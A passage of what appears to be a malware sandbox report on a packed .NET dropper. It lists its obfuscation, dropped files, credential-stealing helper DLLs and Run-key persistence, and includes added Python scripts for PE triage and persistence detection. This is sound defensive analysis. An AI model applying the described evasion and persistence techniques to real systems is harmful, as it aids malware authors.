Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: pnrpnsp.pdbO source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, mozglue.dll.4.dr
Source: Binary string: powrprof.pdbY source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdbJ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: wbemprox.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: edputil.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs .Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_0096231D push rcx; ret 0_2_00962330
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Code function: 0_2_00007FFC08954F91 push edx; iretd 0_2_00007FFC08954F92
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B78C65 push ecx; ret 4_2_00B78C78
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_0040E21D push ecx; ret 6_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: 6_2_021F89E0 pushfd ; ret 6_2_021F89E1
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 7_2_00E6F020 pushad ; retf 7_2_00E6F021
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D5133 pushad ; retf 8_2_00007FFC089D5149
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D514B pushad ; retf 8_2_00007FFC089D5149
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Code function: 8_2_00007FFC089D7546 push ebx; retf 8_2_00007FFC089D771A
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_017EF020 pushad ; retf 12_2_017EF021
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_017EF7B0 pushad ; iretd 12_2_017EF7B1
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 12_2_05679840 push ecx; ret 12_2_05679855
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_0246F000 pushad ; retf 16_2_0246F001
Source: C:\ProgramData\AMD Driver\taskshell.exe Code function: 16_2_056F9840 push ecx; ret 16_2_056F9855
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00B8C810
Binary contains a suspicious time stamp
Source: taskshell.exe.5.dr Static PE information: 0xC9017C47 [Wed Nov 11 10:56:07 2076 UTC]
PE file contains sections with non-standard names
Source: msvcp140.dll.4.dr Static PE information: section name: .didat
Source: sqlite3.dll.4.dr Static PE information: section name: /4
Source: sqlite3.dll.4.dr Static PE information: section name: /19
Source: sqlite3.dll.4.dr Static PE information: section name: /35
Source: sqlite3.dll.4.dr Static PE information: section name: /51
Source: sqlite3.dll.4.dr Static PE information: section name: /63
Source: sqlite3.dll.4.dr Static PE information: section name: /77
Source: sqlite3.dll.4.dr Static PE information: section name: /89
Source: sqlite3.dll.4.dr Static PE information: section name: /102
Source: sqlite3.dll.4.dr Static PE information: section name: /113
Source: sqlite3.dll.4.dr Static PE information: section name: /124
Source: mozglue.dll.4.dr Static PE information: section name: .didat
Source: AnonFileApi.dll.8.dr Static PE information: section name: .vmp0
Source: AnonFileApi.dll.8.dr Static PE information: section name: .vmp1
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
PE file contains an invalid checksum
Source: taskshell.exe.5.dr Static PE information: real checksum: 0x0 should be: 0xcfc4
Source: AnonFileApi.dll.8.dr Static PE information: real checksum: 0x0 should be: 0x585dc
Source: chormuimii.exe.0.dr Static PE information: real checksum: 0x23bfb should be: 0xa304b
Source: svchoste.exe.0.dr Static PE information: real checksum: 0x0 should be: 0x321ee
Source: chormuim.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x5bdcb
Source: dll.exe.0.dr Static PE information: real checksum: 0x0 should be: 0xb0b1
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: real checksum: 0x0 should be: 0xe3370
Source: initial sample Static PE information: section name: .text entropy: 7.98722921393
Source: initial sample Static PE information: section name: .text entropy: 6.83071468332
Source: initial sample Static PE information: section name: .vmp1 entropy: 7.32418075917
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs High entropy of concatenated method names: '.cctor', 'CEx9xH2mGSxCi', 'QnrPnxm4y', 'wEh67y6u9', 'pXmS1viEp', 'ykYe3xYfd', 'LmRaF06sv', 'xM5tQsq7N', 'MUPORZUua', 'dw22U7YNS'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, Jk6HO0XViIf0S55InY/pPhX6qrvDjELNAmx4D.cs High entropy of concatenated method names: 'JRhHee3tbj', 'YpEHanjuQk', 'TwWHt6HdBv', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'X8bVuJc49U5oa8gYsr', 'xORChqDYgHQQatRtJE', 'Abfv4Ky0HZAljerF8f', 'RS8tRa6Z51vZGqJQ6F'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, AxqFycZssMun2tht7k/At4CYuk0fntcDp1Nwe.cs High entropy of concatenated method names: 'UUeH5MhaT', 'EdcT0r0Y8', 'rj8kj87Go', 'lBXZIMo90', 'FSrdt4CYu', '.ctor', '.cctor', 'MqvvaH5DGc4SSUIgl9', 'yBtbfjVDK8EN5xWL4B', 'Y6mdxEJhTGNXyixah7'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, L75rodMXbSfZmJohfD/X4BedjcmF4CAvk4UDx.cs High entropy of concatenated method names: 'HJS9xH22obVgp', '.ctor', '.cctor', 'fKxOdqyDiJBV9rcclV', 'jvusMLz5EhtrwhVaNg', 'Q04IBHPIls6w557absy', 'gcDwtFPPeksGSwhhUHh', 'TcoHplP10h3hpe59Mtc', 'xeylPVvLx4esmX9kK1', 'cnkDSlWV7qSUqOEIVS'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs High entropy of concatenated method names: '.cctor', 'CEx9xH2mGSxCi', 'QnrPnxm4y', 'wEh67y6u9', 'pXmS1viEp', 'ykYe3xYfd', 'LmRaF06sv', 'xM5tQsq7N', 'MUPORZUua', 'dw22U7YNS'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, AxqFycZssMun2tht7k/At4CYuk0fntcDp1Nwe.cs High entropy of concatenated method names: 'UUeH5MhaT', 'EdcT0r0Y8', 'rj8kj87Go', 'lBXZIMo90', 'FSrdt4CYu', '.ctor', '.cctor', 'MqvvaH5DGc4SSUIgl9', 'yBtbfjVDK8EN5xWL4B', 'Y6mdxEJhTGNXyixah7'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, L75rodMXbSfZmJohfD/X4BedjcmF4CAvk4UDx.cs High entropy of concatenated method names: 'HJS9xH22obVgp', '.ctor', '.cctor', 'fKxOdqyDiJBV9rcclV', 'jvusMLz5EhtrwhVaNg', 'Q04IBHPIls6w557absy', 'gcDwtFPPeksGSwhhUHh', 'TcoHplP10h3hpe59Mtc', 'xeylPVvLx4esmX9kK1', 'cnkDSlWV7qSUqOEIVS'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, Jk6HO0XViIf0S55InY/pPhX6qrvDjELNAmx4D.cs High entropy of concatenated method names: 'JRhHee3tbj', 'YpEHanjuQk', 'TwWHt6HdBv', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'X8bVuJc49U5oa8gYsr', 'xORChqDYgHQQatRtJE', 'Abfv4Ky0HZAljerF8f', 'RS8tRa6Z51vZGqJQ6F'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs High entropy of concatenated method names: '.cctor', 'CEx9xH2mGSxCi', 'QnrPnxm4y', 'wEh67y6u9', 'pXmS1viEp', 'ykYe3xYfd', 'LmRaF06sv', 'xM5tQsq7N', 'MUPORZUua', 'dw22U7YNS'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, Jk6HO0XViIf0S55InY/pPhX6qrvDjELNAmx4D.cs High entropy of concatenated method names: 'JRhHee3tbj', 'YpEHanjuQk', 'TwWHt6HdBv', '.ctor', 'kLjw4iIsCLsZtxc4lksN0j', '.cctor', 'X8bVuJc49U5oa8gYsr', 'xORChqDYgHQQatRtJE', 'Abfv4Ky0HZAljerF8f', 'RS8tRa6Z51vZGqJQ6F'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, AxqFycZssMun2tht7k/At4CYuk0fntcDp1Nwe.cs High entropy of concatenated method names: 'UUeH5MhaT', 'EdcT0r0Y8', 'rj8kj87Go', 'lBXZIMo90', 'FSrdt4CYu', '.ctor', '.cctor', 'MqvvaH5DGc4SSUIgl9', 'yBtbfjVDK8EN5xWL4B', 'Y6mdxEJhTGNXyixah7'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, L75rodMXbSfZmJohfD/X4BedjcmF4CAvk4UDx.cs High entropy of concatenated method names: 'HJS9xH22obVgp', '.ctor', '.cctor', 'fKxOdqyDiJBV9rcclV', 'jvusMLz5EhtrwhVaNg', 'Q04IBHPIls6w557absy', 'gcDwtFPPeksGSwhhUHh', 'TcoHplP10h3hpe59Mtc', 'xeylPVvLx4esmX9kK1', 'cnkDSlWV7qSUqOEIVS'
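Every static indicator in this section (a CheckSum field of 0x0 where the header should carry a computed value, a TimeDateStamp in 2076, .vmp0/.vmp1 sections with the entry point inside .vmp1, a .text section whose entropy is close to 8 bits per byte) can be re-derived from the PE headers without the sandbox. The script below is an added example, not part of the Joe Sandbox report or the analysed sample: it parses a PE32 image with the Python standard library only and runs against a constructed in-memory sample whose TimeDateStamp is set to the report's 0xC9017C47. The section names, section bodies, the 7.0 entropy threshold and the list of "standard" section names are assumptions chosen for illustration.

```python
"""Static PE32 triage reproducing the indicators listed above.  Added example: standard
library only, PE32 only (PE32+ shifts the optional-header fields), constructed sample."""
import math
import struct
from datetime import datetime, timedelta, timezone

FILE_ALIGN = 0x200
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata",
                     ".rsrc", ".reloc", ".bss", ".tls", ".CRT"}   # assumed allow-list

def shannon_entropy(buf: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 when every value is equally common."""
    if not buf:
        return 0.0
    counts = [0] * 256
    for b in buf:
        counts[b] += 1
    return -sum(c / len(buf) * math.log2(c / len(buf)) for c in counts if c)

def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """One's-complement sum of 16-bit words plus the file length, as imagehlp's
    CheckSumMappedFile computes it; the CheckSum field itself is skipped."""
    padded = data + b"\0" * (len(data) % 2)
    total = 0
    for off in range(0, len(padded), 2):
        if off in (checksum_offset, checksum_offset + 2):
            continue
        total += struct.unpack_from("<H", padded, off)[0]
        total = (total & 0xFFFF) + (total >> 16)          # end-around carry
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)

def pe_timestamp_to_utc(ts: int) -> datetime:
    """Seconds since the Unix epoch; epoch + delta also handles far-future stamps."""
    return datetime(1970, 1, 1, tzinfo=timezone.utc) + timedelta(seconds=ts)

def parse_pe32(data: bytes) -> dict:
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                    # optional header follows COFF header
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "va": va,
                         "size": max(vsize, rawsize), "data": data[rawptr:rawptr + rawsize]})
    return {"timestamp": ts, "entry_rva": struct.unpack_from("<I", data, opt + 16)[0],
            "checksum": struct.unpack_from("<I", data, opt + 64)[0],
            "checksum_offset": opt + 64, "sections": sections}

def triage(data: bytes, now=None) -> list:
    """Report-style findings for one image; `now` is injectable for deterministic tests."""
    pe, now, findings = parse_pe32(data), now or datetime.now(timezone.utc), []
    expected = pe_checksum(data, pe["checksum_offset"])
    if pe["checksum"] != expected:
        findings.append(f"invalid checksum: real 0x{pe['checksum']:x} should be 0x{expected:x}")
    built = pe_timestamp_to_utc(pe["timestamp"])
    if built > now:
        findings.append(f"suspicious timestamp: 0x{pe['timestamp']:08X} [{built:%a %b %d %H:%M:%S %Y} UTC]")
    entry = next((s["name"] for s in pe["sections"]
                  if s["va"] <= pe["entry_rva"] < s["va"] + s["size"]), None)
    if entry not in STANDARD_SECTIONS:
        findings.append(f"entry point 0x{pe['entry_rva']:x} lies in non-standard section {entry}")
    for s in pe["sections"]:
        if s["name"] not in STANDARD_SECTIONS:
            findings.append(f"non-standard section name: {s['name']}")
        ent = shannon_entropy(s["data"])
        if ent > 7.0:                                  # packed or encrypted code sits near 8
            findings.append(f"section {s['name']} entropy {ent:.3f}")
    return findings

def patch_checksum(data: bytes) -> bytes:
    """Write the computed checksum into the header, as a linker's /RELEASE switch does."""
    off, out = parse_pe32(data)["checksum_offset"], bytearray(data)
    struct.pack_into("<I", out, off, pe_checksum(data, off))
    return bytes(out)

def build_pe32(sections, timestamp: int, entry_rva: int) -> bytes:
    """Constructed PE32 with valid headers and placeholder bodies; CheckSum stays 0x0."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)             # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                     # AddressOfEntryPoint
    hdr_len = len(dos) + 4 + len(coff) + len(opt) + 40 * len(sections)
    raw_ptr, va, hdrs, bodies = -(-hdr_len // FILE_ALIGN) * FILE_ALIGN, 0x1000, b"", b""
    for name, body in sections:
        body += b"\0" * (-len(body) % FILE_ALIGN)
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(body), va,
                            len(body), raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw_ptr, va, bodies = raw_ptr + len(body), va + 0x1000, bodies + body
    head = dos + b"PE\0\0" + coff + bytes(opt) + hdrs
    return head + b"\0" * (-len(head) % FILE_ALIGN) + bodies

SAMPLE = build_pe32(                      # constructed sample, not the analysed binary
    [(".text", bytes(range(256)) * 4),    # every byte value equally often: entropy 8.0
     (".vmp1", b"\xCC" * 64)],            # VMProtect-style section name, low-entropy stub
    timestamp=0xC9017C47,                 # the TimeDateStamp flagged above (Nov 2076)
    entry_rva=0x2000,                     # entry point inside .vmp1, not .text
)

if __name__ == "__main__":
    for line in triage(SAMPLE):
        print(line)
```

pe_checksum skips the CheckSum field itself, which is why writing the computed value back and recomputing yields the same number; that is the check behind the report's "real checksum: 0x0 should be …" lines. A zero checksum on its own is weak evidence, since the loader only enforces it for drivers and boot-time system DLLs and many linkers leave it blank, and a far-future TimeDateStamp is not conclusive either: MSVC's /Brepro replaces the field with a hash of the image, so legitimate reproducible builds also carry implausible dates. The combination seen here (zero checksum, future stamp, .vmp sections, entry point outside .text and a .text section near 8 bits per byte) is what makes the set convincing.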

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\dll.exe File created: C:\ProgramData\AMD Driver\taskshell.exe
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\softokn3.dll
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File created: C:\Users\user\AppData\Local\Temp\AnonFileApi.dll
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe File created: C:\Users\user\AppData\Local\Temp\dll.exe
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe File created: C:\Users\user\AppData\Local\Temp\svchoste.exe
Source: C:\Users\user\AppData\Local\Temp\dll.exe File created: C:\ProgramData\AMD Driver\taskshell.exe
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe File created: C:\Users\user\AppData\Local\Temp\chormuimii.exe
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File created: C:\Users\user\AppData\Local\Temp\DotNetZip.dll
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe File created: C:\Users\user\AppData\Local\Temp\chormuim.exe
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\dll.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run WMI Update Service (2 occurrences)
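The persistence chain recorded above is a dropper (dll.exe, itself running from the user's Temp directory) writing taskshell.exe into C:\ProgramData\AMD Driver and then registering that path under an HKCU Run value named "WMI Update Service", while svchoste.exe stages browser-credential helper DLLs next to it. The detection below is an added example and not part of the Joe Sandbox report: it runs over constructed, Sysmon-like event dictionaries (11 = FileCreate, 13 = RegistryValueSet) whose paths mirror the report, and the event shape, the user-writable path list and the rule names are assumptions for illustration, not real Sysmon XML.

```python
"""Rules over constructed Sysmon-style events for the drop-then-persist chain above.
Added example; event dicts are a simplified, hypothetical shape, not Sysmon's XML."""
import re

RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\([^\\]+)$", re.I)
# Locations a standard user can write to; a Run value launching from here is rarely legitimate
USER_WRITABLE = re.compile(r"^C:\\(ProgramData|Users\\[^\\]+\\AppData)\\", re.I)
# Leading executable path of a Run value, quoted or not, with or without arguments
EXE_IN_VALUE = re.compile(r'^"?([A-Za-z]:\\[^"]*?\.(?:exe|dll))"?(?:\s|$)', re.I)

EVENTS = [  # constructed sample in arrival order; the paths are the ones listed above
    {"id": 11, "image": r"C:\Users\user\AppData\Local\Temp\svchoste.exe",
     "target": r"C:\ProgramData\nss3.dll"},
    {"id": 11, "image": r"C:\Users\user\AppData\Local\Temp\dll.exe",
     "target": r"C:\ProgramData\AMD Driver\taskshell.exe"},
    {"id": 13, "image": r"C:\Users\user\AppData\Local\Temp\dll.exe",
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\WMI Update Service",
     "details": r'"C:\ProgramData\AMD Driver\taskshell.exe"'},
    {"id": 13, "image": r"C:\Program Files\Vendor\setup.exe",        # benign control case
     "target": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "details": r'"C:\Program Files\Vendor\tray.exe" /background'},
]

def run_value_target(details: str):
    """Executable a Run value launches, or None when it is not a plain path (LOLBin etc.)."""
    m = EXE_IN_VALUE.match(details.strip())
    return m.group(1) if m else None

def detect(events) -> list:
    """Alerts for PE drops into ProgramData by Temp-resident images and for Run values
    pointing at user-writable paths, escalated when the registering process dropped the file."""
    dropped = {}                     # lower-cased dropped path -> image that created it
    alerts = []
    for ev in events:
        if ev["id"] == 11 and ev["target"].lower().endswith((".exe", ".dll")):
            dropped[ev["target"].lower()] = ev["image"]
            if (ev["target"].lower().startswith("c:\\programdata\\")
                    and "\\appdata\\local\\temp\\" in ev["image"].lower()):
                alerts.append({"rule": "pe_drop_programdata", "severity": "medium",
                               "image": ev["image"], "target": ev["target"]})
        elif ev["id"] == 13:
            m = RUN_KEY.search(ev["target"])
            exe = run_value_target(ev.get("details", "")) if m else None
            if exe and USER_WRITABLE.match(exe):
                alert = {"rule": "run_key_user_writable", "severity": "high",
                         "value_name": m.group(2), "image": ev["image"], "target": exe}
                if dropped.get(exe.lower()) == ev["image"]:   # dropper registered its own payload
                    alert.update(rule="dropper_self_persist", severity="critical")
                alerts.append(alert)
    return alerts

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(a)
```

The correlation keys on the file path, not on the value name: "WMI Update Service" is chosen to read like a Windows component, so an allow-list of value names would be the wrong control. Two caveats when moving this onto real telemetry: REG_EXPAND_SZ values may hold %ProgramData% rather than a literal drive path and must be expanded before matching, and values that launch a LOLBin (rundll32.exe, regsvr32.exe, mshta.exe) with the payload as an argument return None from run_value_target and need a separate rule.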

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe File opened: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe:Zone.Identifier read attributes | delete
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe File opened: C:\Users\user\AppData\Local\Temp\chormuimii.exe:Zone.Identifier read attributes | delete
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B89700 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_00B89700
Suppresses file-open error dialogs via SetErrorMode (SEM_NOOPENFILEERRORBOX), so a failed load of a missing file or DLL shows no error box; low-weight on its own, since runtimes and libraries set this flag themselves, and meaningful here only in combination with the signatures above
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Process information set: NOOPENFILEERRORBOX (16 occurrences)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Process information set: NOOPENFILEERRORBOX (1 occurrence)
Source: C:\Users\user\AppData\Local\Temp\dll.exe Process information set: NOOPENFILEERRORBOX (15 occurrences)
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Process information set: NOOPENFILEERRORBOX (19 occurrences)
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX (24 occurrences)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process information set: NOOPENFILEERRORBOX (51 occurrences)
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX (22 further occurrences)
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\AMD Driver\taskshell.exe Process information set: NOOPENFILEERRORBOX
